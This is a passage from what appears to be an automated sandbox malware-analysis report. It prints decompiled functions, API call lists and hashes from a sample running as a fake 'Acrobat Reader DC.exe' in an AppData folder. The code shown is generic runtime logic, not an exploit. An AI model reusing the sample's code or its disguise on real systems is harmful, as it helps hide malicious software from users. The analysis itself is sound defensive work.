                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                  • String ID:
                                  • API String ID: 3771399671-0
                                  • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                  • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                  • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                  • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00434621(void* __ecx, int _a4, int _a8, int _a12) {
				long _v8;
				int _t16;
				long _t17;
				long _t19;
				long _t22;
				long _t24;
				long _t32;
				long _t33;
				long _t35;
				struct HWND__* _t38;
				long _t43;
				void* _t55;

				_t38 = _a8;
				if(_t38 != 0) {
					L2:
					_a8 = 0;
					_v8 = 0;
					_t43 = GetCurrentThreadId();
					if(_a12 == 0) {
						if(_t38 != 0) {
							_t17 =  *0x4a95bc; // 0x0
							AttachThreadInput(_t43, _t17, 0);
							_t33 =  *0x4a95c0; // 0x0
							_t19 =  *0x4a95bc; // 0x0
							if(_t33 != _t19) {
								AttachThreadInput(_t33, _t19, 0);
							}
						}
						_t32 =  *0x4a95c0; // 0x0
						_t16 = AttachThreadInput(_t43, _t32, 0);
						goto L18;
					} else {
						_t22 = GetWindowThreadProcessId(GetForegroundWindow(), 0);
						 *0x4a95c0 = _t22;
						_a12 = AttachThreadInput(_t43, _t22, 1);
						if(_t38 == 0) {
							_t16 = _v8;
						} else {
							_t24 = GetWindowThreadProcessId(_t38,  &_v8);
							_t35 =  *0x4a95c0; // 0x0
							 *0x4a95bc = _t24;
							if(_t35 != _t24) {
								_a8 = AttachThreadInput(_t35, _t24, 1);
								_t24 =  *0x4a95bc; // 0x0
							}
							_t16 = AttachThreadInput(_t43, _t24, 1);
						}
						if(_a12 != 0 || _a8 != 0 || _t16 != 0) {
							L18:
							goto L19;
						} else {
							_t16 =  *0x4a95c0; // 0x0
							if(_t43 != _t16) {
								goto L18;
							} else {
								_t55 = _t16 -  *0x4a95bc; // 0x0
								if(_t55 != 0) {
									goto L18;
								} else {
									 *((intOrPtr*)(_a4 + 0x20)) = 0;
									return _t16;
								}
							}
						}
					}
				} else {
					_t16 = _a4;
					if( *((intOrPtr*)(_t16 + 9)) == 0) {
						L19:
						return _t16;
					} else {
						goto L2;
					}
				}
			}















                                  0x00434627
                                  0x0043462e
                                  0x0043463c
                                  0x0043463d
                                  0x00434640
                                  0x00434649
                                  0x0043464e
                                  0x004346e9
                                  0x004346eb
                                  0x004346f3
                                  0x004346f5
                                  0x004346fb
                                  0x00434702
                                  0x00434707
                                  0x00434707
                                  0x00434702
                                  0x00434709
                                  0x00434712
                                  0x00000000
                                  0x00434654
                                  0x0043465c
                                  0x0043466c
                                  0x00434673
                                  0x00434678
                                  0x004346aa
                                  0x0043467a
                                  0x0043467f
                                  0x00434685
                                  0x0043468b
                                  0x00434692
                                  0x0043469a
                                  0x0043469d
                                  0x0043469d
                                  0x004346a6
                                  0x004346a6
                                  0x004346b1
                                  0x00434714
                                  0x00000000
                                  0x004346bd
                                  0x004346bd
                                  0x004346c4
                                  0x00000000
                                  0x004346c6
                                  0x004346c6
                                  0x004346cc
                                  0x00000000
                                  0x004346ce
                                  0x004346d3
                                  0x004346de
                                  0x004346de
                                  0x004346cc
                                  0x004346c4
                                  0x004346b1
                                  0x00434630
                                  0x00434630
                                  0x00434636
                                  0x00434715
                                  0x0043471a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00434636

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                  • String ID:
                                  • API String ID: 2156557900-0
                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004542ED Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 271libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E004542ED(void* _a4, signed int _a8, signed int _a12, intOrPtr _a16, _Unknown_base(*)()* _a20, intOrPtr* _a24, intOrPtr* _a28) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int __edi;
				signed int __esi;
				intOrPtr _t118;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t128;
				intOrPtr _t134;
				intOrPtr _t135;
				struct HINSTANCE__** _t144;
				void* _t147;
				void* _t151;
				struct HINSTANCE__* _t155;
				intOrPtr* _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				signed int _t173;
				struct HINSTANCE__* _t181;
				signed int _t187;
				signed int _t195;
				signed int _t200;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t205;
				void* _t206;
				void* _t207;

				_t158 = _a4;
				_t203 = _a20;
				_t200 = 0;
				 *_a28 = 0;
				 *_a24 = 0;
				E00408F40(0, _t203);
				 *((intOrPtr*)(_t203 + 8)) = 1;
				 *_t203 = 1;
				_t118 =  *((intOrPtr*)(_t158 + 8));
				_a20 = 0;
				_v16 = 0;
				_v20 = _t118;
				if(_t118 <= 0) {
					L13:
					return 6;
				} else {
					while(_a20 == 0) {
						_t188 =  *(_t158 + 4);
						_t144 = ( *(_t158 + 4))[_t200];
						if( *_t144 == 0) {
							L11:
							_t200 = _t200 + 1;
							if(_t200 < _v20) {
								continue;
							} else {
								if(_a20 != 0) {
									break;
								} else {
									goto L13;
								}
							}
						} else {
							_t188 =  *_t144;
							_v8 = 0;
							if( *((intOrPtr*)( *_t144 + 4)) <= 0) {
								goto L11;
							} else {
								_a4 = 0;
								while(1) {
									_t147 = E00422EED(_t200, _t203, _a8,  *((intOrPtr*)( *((intOrPtr*)( *_t144 + 8)) + _a4)));
									_t205 = _t205 + 8;
									if(_t147 == 0) {
										break;
									}
									_t144 = ( *(_t158 + 4))[_t200];
									_t188 =  *_t144;
									_a4 = _a4 + 0xc;
									_t187 = _v8 + 1;
									_v8 = _t187;
									if(_t187 <  *((intOrPtr*)( *_t144 + 4))) {
										continue;
									} else {
										goto L11;
									}
									goto L46;
								}
								_t181 = ( *(( *(_t158 + 4))[_t200]))[2];
								_t195 = _a12;
								_t151 = _v8 + _v8 * 2 + _v8 + _v8 * 2 + _v8 + _v8 * 2 + _v8 + _v8 * 2;
								if(_t195 <  *((intOrPtr*)(_t181 + _t151 + 4)) || _t195 >  *((intOrPtr*)(_t181 + _t151 + 8))) {
									return 7;
								} else {
									_a20 = GetProcAddress( *( *(( *(_t158 + 4))[_t200])),  *(( *(( *(_t158 + 4))[_t200]))[2] + _t151));
									_t155 =  *(_t158 + 4);
									_t188 =  *( *(_t155[_t200]));
									_v16 = GetProcAddress( *( *(_t155[_t200])), "AU3_FreeVar");
									goto L11;
								}
							}
						}
						goto L46;
					}
					_t201 = _a12;
					_t122 = E004135BB(_t188, _t201, _t203, _t201 << 4);
					_t159 = 0;
					_t206 = _t205 + 4;
					_a4 = _t122;
					_a8 = 0;
					if(_t201 > 0) {
						_t202 = _t122;
						do {
							_t134 = _a16;
							_t173 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4)) + 8)) + 0xfffffffe;
							if(_t173 > 5) {
								L25:
								 *_t202 = 1;
								_t135 = E0040C650( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4)));
								goto L26;
							} else {
								switch( *((intOrPtr*)(_t173 * 4 +  &M00454611))) {
									case 0:
										 *__edi = 2;
										__edx =  *(__eax + 4);
										__eax =  *( *(__eax + 4) + __ebx * 4);
										__eax = E00443006( *( *(__eax + 4) + __ebx * 4));
										 *(__edi + 0xc) = __edx;
										goto L26;
									case 1:
										 *__edi = 3;
										__ecx =  *(__eax + 4);
										__ecx =  *( *(__eax + 4) + __ebx * 4);
										__eax = E0040BAA0(__ecx);
										 *(__edi + 8) = __fp0;
										goto L27;
									case 2:
										 *_t202 = 4;
										_t163 = E0040F6F0(E0045340C( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4))), _t173 | 0xffffffff, _t203);
										_t141 = E004135BB(_t192, _t202, _t203, E00413530(_t163) + 1);
										_t211 = _t206 + 8;
										 *((intOrPtr*)(_t202 + 8)) = _t141;
										if(_t141 != 0) {
											E00413650(_t141, _t163);
											_t211 = _t211 + 8;
										}
										_push(_t163);
										E004111DC();
										_t159 = _a8;
										_t206 = _t211 + 4;
										goto L27;
									case 3:
										goto L25;
									case 4:
										 *__edi = 5;
										__eax =  *(__eax + __ebx * 4);
										__eax = E0044B3AC(__eax);
										L26:
										 *((intOrPtr*)(_t202 + 8)) = _t135;
										goto L27;
								}
							}
							L27:
							_t159 = _t159 + 1;
							_t202 = _t202 + 0x10;
							_a8 = _t159;
						} while (_t159 < _a12);
						_t201 = _a12;
						_t122 = _a4;
					}
					_v12 = 0;
					_a20(_t201, _t122,  &_v12, _a24, _a28);
					_t124 = _v12;
					_t207 = _t206 + 0x14;
					if(_t124 != 0) {
						_t168 =  *_t124 + 0xfffffffe;
						if(_t168 > 3) {
							_t160 =  *((intOrPtr*)(_t124 + 8));
							E00408F40(_t201, _t203);
							 *((intOrPtr*)(_t203 + 8)) = 1;
							goto L37;
						} else {
							switch( *((intOrPtr*)(_t168 * 4 +  &M00454629))) {
								case 0:
									_t160 =  *((intOrPtr*)(_t124 + 8));
									_v20 =  *((intOrPtr*)(_t124 + 0xc));
									E00408F40(_t201, _t203);
									 *((intOrPtr*)(_t203 + 8)) = 2;
									 *((intOrPtr*)(_t203 + 4)) = _v20;
									goto L37;
								case 1:
									__fp0 =  *(__eax + 8);
									_v24 =  *(__eax + 8);
									__eax = E00408F40(__edi, __esi);
									__fp0 = _v24;
									 *((intOrPtr*)(__esi + 8)) = 3;
									 *__esi = _v24;
									goto L38;
								case 2:
									__edx =  *(__eax + 8);
									__eax = E0043299A( *(__eax + 8), 0xffffffff);
									__ebx = __esi;
									__edi = __eax;
									__eax = E0040E710(__eax, __esi, __ecx);
									_push(__edi);
									__eax = E004111DC();
									__edi = _a12;
									__esp = __esp + 4;
									goto L38;
								case 3:
									__ebx =  *(__eax + 8);
									__eax = E00408F40(__edi, __esi);
									 *((intOrPtr*)(__esi + 8)) = 7;
									L37:
									 *_t203 = _t160;
									goto L38;
							}
						}
						L38:
						if(_t201 > 0) {
							_t204 = _a4;
							do {
								if( *_t204 == 4) {
									E00413748( *((intOrPtr*)(_t204 + 8)));
									_t207 = _t207 + 4;
								}
								_t204 = _t204 + 0x10;
								_t201 = _t201 - 1;
							} while (_t201 != 0);
						}
						E00413748(_a4);
						_t128 = _v16;
						if(_t128 != 0) {
							 *_t128(_v12);
						}
					}
					return 0;
				}
				L46:
			}




































                                  0x004542fa
                                  0x004542fe
                                  0x00454302
                                  0x00454304
                                  0x00454306
                                  0x00454308
                                  0x0045430d
                                  0x00454314
                                  0x0045431a
                                  0x0045431d
                                  0x00454320
                                  0x00454323
                                  0x00454328
                                  0x004543f8
                                  0x00454403
                                  0x0045432e
                                  0x0045432e
                                  0x00454339
                                  0x0045433c
                                  0x00454341
                                  0x004543e8
                                  0x004543e8
                                  0x004543ec
                                  0x00000000
                                  0x004543f2
                                  0x004543f6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004543f6
                                  0x00454347
                                  0x00454347
                                  0x00454349
                                  0x0045434f
                                  0x00000000
                                  0x00454355
                                  0x00454355
                                  0x00454358
                                  0x00454368
                                  0x0045436d
                                  0x00454372
                                  0x00000000
                                  0x00000000
                                  0x0045437a
                                  0x0045437d
                                  0x0045437f
                                  0x00454383
                                  0x00454384
                                  0x0045438a
                                  0x00000000
                                  0x0045438c
                                  0x00000000
                                  0x0045438c
                                  0x00000000
                                  0x0045438a
                                  0x00454399
                                  0x0045439c
                                  0x004543a4
                                  0x004543aa
                                  0x00454411
                                  0x004543b2
                                  0x004543cc
                                  0x004543cf
                                  0x004543d7
                                  0x004543e5
                                  0x00000000
                                  0x004543e5
                                  0x004543aa
                                  0x0045434f
                                  0x00000000
                                  0x00454341
                                  0x00454414
                                  0x0045441d
                                  0x00454422
                                  0x00454424
                                  0x00454427
                                  0x0045442a
                                  0x0045442f
                                  0x00454435
                                  0x0045443d
                                  0x0045443d
                                  0x00454449
                                  0x0045444f
                                  0x004544ed
                                  0x004544ed
                                  0x004544f9
                                  0x00000000
                                  0x00454455
                                  0x00454455
                                  0x00000000
                                  0x004544c2
                                  0x004544c8
                                  0x004544cb
                                  0x004544cf
                                  0x004544d4
                                  0x00000000
                                  0x00000000
                                  0x004544ac
                                  0x004544b2
                                  0x004544b5
                                  0x004544b8
                                  0x004544bd
                                  0x00000000
                                  0x00000000
                                  0x0045445c
                                  0x00454478
                                  0x00454485
                                  0x0045448a
                                  0x0045448d
                                  0x00454492
                                  0x00454496
                                  0x0045449b
                                  0x0045449b
                                  0x0045449e
                                  0x0045449f
                                  0x004544a4
                                  0x004544a7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004544d9
                                  0x004544e2
                                  0x004544e6
                                  0x004544fe
                                  0x004544fe
                                  0x00000000
                                  0x00000000
                                  0x00454455
                                  0x00454501
                                  0x00454501
                                  0x00454502
                                  0x00454505
                                  0x00454508
                                  0x00454511
                                  0x00454514
                                  0x00454514
                                  0x00454525
                                  0x0045452c
                                  0x0045452f
                                  0x00454532
                                  0x00454537
                                  0x0045453f
                                  0x00454545
                                  0x004545ba
                                  0x004545bd
                                  0x004545c2
                                  0x00000000
                                  0x00454547
                                  0x00454547
                                  0x00000000
                                  0x0045454e
                                  0x00454554
                                  0x00454557
                                  0x0045455f
                                  0x00454566
                                  0x00000000
                                  0x00000000
                                  0x0045456b
                                  0x0045456e
                                  0x00454571
                                  0x00454576
                                  0x00454579
                                  0x00454580
                                  0x00000000
                                  0x00000000
                                  0x00454595
                                  0x0045459b
                                  0x004545a3
                                  0x004545a5
                                  0x004545a7
                                  0x004545ac
                                  0x004545ad
                                  0x004545b2
                                  0x004545b5
                                  0x00000000
                                  0x00000000
                                  0x00454584
                                  0x00454587
                                  0x0045458c
                                  0x004545c9
                                  0x004545c9
                                  0x00000000
                                  0x00000000
                                  0x00454547
                                  0x004545cb
                                  0x004545cd
                                  0x004545cf
                                  0x004545d2
                                  0x004545d5
                                  0x004545db
                                  0x004545e0
                                  0x004545e0
                                  0x004545e3
                                  0x004545e6
                                  0x004545e6
                                  0x004545d2
                                  0x004545ed
                                  0x004545f2
                                  0x004545fa
                                  0x00454600
                                  0x00454602
                                  0x004545fa
                                  0x0045460d
                                  0x0045460d
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressProc_free_malloc$_strlen
                                  • String ID: AU3_FreeVar
                                  • API String ID: 3358881862-771828931
                                  • Opcode ID: 9189223602f4225252d80b21b209c7ea8eb6c5ba0733661d26557e2285be57dc
                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                  • Opcode Fuzzy Hash: 9189223602f4225252d80b21b209c7ea8eb6c5ba0733661d26557e2285be57dc
                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045FBAC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 147windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0045FBAC(struct HMENU__** _a4, short _a8, short* _a12, int _a16, int _a20, intOrPtr _a24) {
				struct tagMENUITEMINFOW _v52;
				int _t44;
				int _t50;
				struct HMENU__* _t53;
				int _t54;
				short _t58;
				struct HMENU__* _t64;
				int _t65;
				int _t66;
				struct HMENU__* _t68;
				struct HMENU__** _t70;
				int _t74;
				short* _t76;
				int _t79;
				signed int _t87;
				struct HMENU__** _t93;

				_t44 = _a16;
				_t70 = _a4;
				if(_t44 == 0xffffffff || _t44 >= 7 && _t44 < 0x207) {
					_t87 = E0044C2C9(_t70);
					if(_t87 == 0xffffffff) {
						goto L29;
					} else {
						_t93 =  *(_t70 + 0x1b4 + _t87 * 4);
						_v52.cbSize = 0x30;
						E00412F40( &(_v52.fMask), 0, 0x2c);
						_t49 = _a16;
						if(_a16 != 0xffffffff) {
							_a16 = 0xffffffff;
							_t50 = E00434179(_t70, _t49,  &_a16);
							__eflags = _t50;
							if(_t50 == 0) {
								L28:
								E0044422D(_t70, _t87);
								goto L29;
							} else {
								_t74 = _a16;
								_v52.fMask = 4;
								_t53 =  *( *(_t70 + 0x1b4 + _t74 * 4));
								 *_t93 = _t53;
								_t54 = GetMenuItemInfoW(_t53, _t74, 0,  &_v52);
								__eflags = _t54;
								if(_t54 == 0) {
									goto L28;
								} else {
									 *_t93 = _v52.hSubMenu;
									__eflags = IsMenu(_v52.hSubMenu);
									if(__eflags == 0) {
										goto L28;
									} else {
										goto L9;
									}
								}
							}
						} else {
							 *_t93 =  *_t70;
							L9:
							_t58 = _a8;
							_t76 = _a12;
							_t93[1] = 0;
							_v52.fMask = 0x32;
							_v52.fType = 0;
							_v52.dwTypeData = _t76;
							_v52.dwItemData = _t87;
							_v52.wID = _t87;
							if(_t58 == 0) {
								__eflags =  *_t76;
								if( *_t76 != 0) {
									__eflags = _a24 - 1;
									if(_a24 == 1) {
										_v52.fType = 0x200;
										_t93[1] = 1;
									}
								} else {
									_v52.fType = 0x800;
								}
								_t93[1] = 0;
								goto L19;
							} else {
								if(_t58 != 1) {
									L19:
									__eflags = _t70[1];
									if(_t70[1] != 0) {
										__eflags = _t70[2];
										if(_t70[2] != 0) {
											__eflags = _t87 - 7;
											if(_t87 >= 7) {
												_t64 =  *_t70;
												__eflags =  *_t93 - _t64;
												if( *_t93 == _t64) {
													_t65 = GetMenuItemCount(_t64);
													_t79 = _a20;
													__eflags = _t79 - 0xffffffff;
													if(_t79 == 0xffffffff) {
														L25:
														_t66 = _t65 + 0xfffffffc;
														__eflags = _t66;
														_a20 = _t66;
													} else {
														_t39 = _t65 - 4; // -4
														__eflags = _t79 + 1 - _t39;
														if(_t79 + 1 > _t39) {
															goto L25;
														}
													}
												}
											}
										}
									}
									__eflags = InsertMenuItemW( *_t93, _a20, 1,  &_v52);
									if(__eflags == 0) {
										goto L12;
									} else {
										_t70[0x275] = _t87;
										return _t87;
									}
								} else {
									_t68 = CreatePopupMenu();
									_t106 = _t68;
									if(_t68 != 0) {
										_v52.fMask = _v52.fMask | 0x00000004;
										_v52.hSubMenu = _t68;
										_t93[1] = 1;
										goto L19;
									} else {
										L12:
										E0045FA41(_t70, _t106, _t87);
										return 0;
									}
								}
							}
						}
					}
				} else {
					L29:
					__eflags = 0;
					return 0;
				}
			}



















                                  0x0045fbaf
                                  0x0045fbb6
                                  0x0045fbbe
                                  0x0045fbda
                                  0x0045fbdf
                                  0x00000000
                                  0x0045fbe5
                                  0x0045fbe5
                                  0x0045fbf4
                                  0x0045fbfb
                                  0x0045fc00
                                  0x0045fc09
                                  0x0045fc17
                                  0x0045fc1e
                                  0x0045fc23
                                  0x0045fc25
                                  0x0045fd45
                                  0x0045fd47
                                  0x00000000
                                  0x0045fc2b
                                  0x0045fc2b
                                  0x0045fc32
                                  0x0045fc40
                                  0x0045fc46
                                  0x0045fc48
                                  0x0045fc4e
                                  0x0045fc50
                                  0x00000000
                                  0x0045fc56
                                  0x0045fc59
                                  0x0045fc65
                                  0x0045fc67
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0045fc67
                                  0x0045fc50
                                  0x0045fc0b
                                  0x0045fc0d
                                  0x0045fc6d
                                  0x0045fc71
                                  0x0045fc74
                                  0x0045fc77
                                  0x0045fc7b
                                  0x0045fc82
                                  0x0045fc89
                                  0x0045fc8c
                                  0x0045fc8f
                                  0x0045fc92
                                  0x0045fcc1
                                  0x0045fcc5
                                  0x0045fcd0
                                  0x0045fcd4
                                  0x0045fcd6
                                  0x0045fcdd
                                  0x0045fcdd
                                  0x0045fcc7
                                  0x0045fcc7
                                  0x0045fcc7
                                  0x0045fce1
                                  0x00000000
                                  0x0045fc94
                                  0x0045fc95
                                  0x0045fce5
                                  0x0045fce5
                                  0x0045fce9
                                  0x0045fceb
                                  0x0045fcef
                                  0x0045fcf1
                                  0x0045fcf4
                                  0x0045fcf6
                                  0x0045fcf8
                                  0x0045fcfa
                                  0x0045fcfd
                                  0x0045fd03
                                  0x0045fd06
                                  0x0045fd09
                                  0x0045fd13
                                  0x0045fd13
                                  0x0045fd13
                                  0x0045fd16
                                  0x0045fd0b
                                  0x0045fd0b
                                  0x0045fd0f
                                  0x0045fd11
                                  0x00000000
                                  0x00000000
                                  0x0045fd11
                                  0x0045fd09
                                  0x0045fcfa
                                  0x0045fcf4
                                  0x0045fcef
                                  0x0045fd2c
                                  0x0045fd2e
                                  0x00000000
                                  0x0045fd34
                                  0x0045fd34
                                  0x0045fd42
                                  0x0045fd42
                                  0x0045fc97
                                  0x0045fc97
                                  0x0045fc9d
                                  0x0045fc9f
                                  0x0045fcb4
                                  0x0045fcb8
                                  0x0045fcbb
                                  0x00000000
                                  0x0045fca1
                                  0x0045fca1
                                  0x0045fca4
                                  0x0045fcb1
                                  0x0045fcb1
                                  0x0045fc9f
                                  0x0045fc95
                                  0x0045fc92
                                  0x0045fc09
                                  0x0045fd4c
                                  0x0045fd4c
                                  0x0045fd4e
                                  0x0045fd54
                                  0x0045fd54

                                  APIs
                                  • _memset.LIBCMT ref: 0045FBFB
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                  • IsMenu.USER32 ref: 0045FC5F
                                  • CreatePopupMenu.USER32(00000000,?,76F033D0), ref: 0045FC97
                                  • GetMenuItemCount.USER32 ref: 0045FCFD
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                  • String ID: 0$2
                                  • API String ID: 3311875123-3793063076
                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E00434034(int _a4, char _a8) {
				short _v520;
				short _v1036;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t26;

				LoadStringW(GetModuleHandleW(0), _a4,  &_v520, 0x100);
				LoadStringW(GetModuleHandleW(0), 0x1389,  &_v1036, 0x100);
				_t29 = _a8;
				_t23 = _t21;
				_t26 = _t24;
				if(_a8 == 0) {
					return MessageBoxW(0,  &_v1036,  &_v520, 0x11010);
				} else {
					_push(0x484ea8);
					_push(0x484ea8);
					_push( &_v1036);
					_push(0);
					_push( &_v520);
					_push(L"%s (%d) : ==> %s: \n%s \n%s\n");
					return E00413ABE(_t16,  &_v1036, _t23, _t26, _t29);
				}
			}













                                  0x00434060
                                  0x00434078
                                  0x0043407a
                                  0x0043407e
                                  0x0043407f
                                  0x00434086
                                  0x004340c2
                                  0x00434088
                                  0x00434088
                                  0x0043408d
                                  0x00434092
                                  0x00434093
                                  0x0043409b
                                  0x0043409c
                                  0x004340a9
                                  0x004340a9

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe), ref: 00434057
                                  • LoadStringW.USER32(00000000), ref: 00434060
                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                  • LoadStringW.USER32(00000000), ref: 00434078
                                  • _wprintf.LIBCMT ref: 004340A1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                  Strings
                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 00434040
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
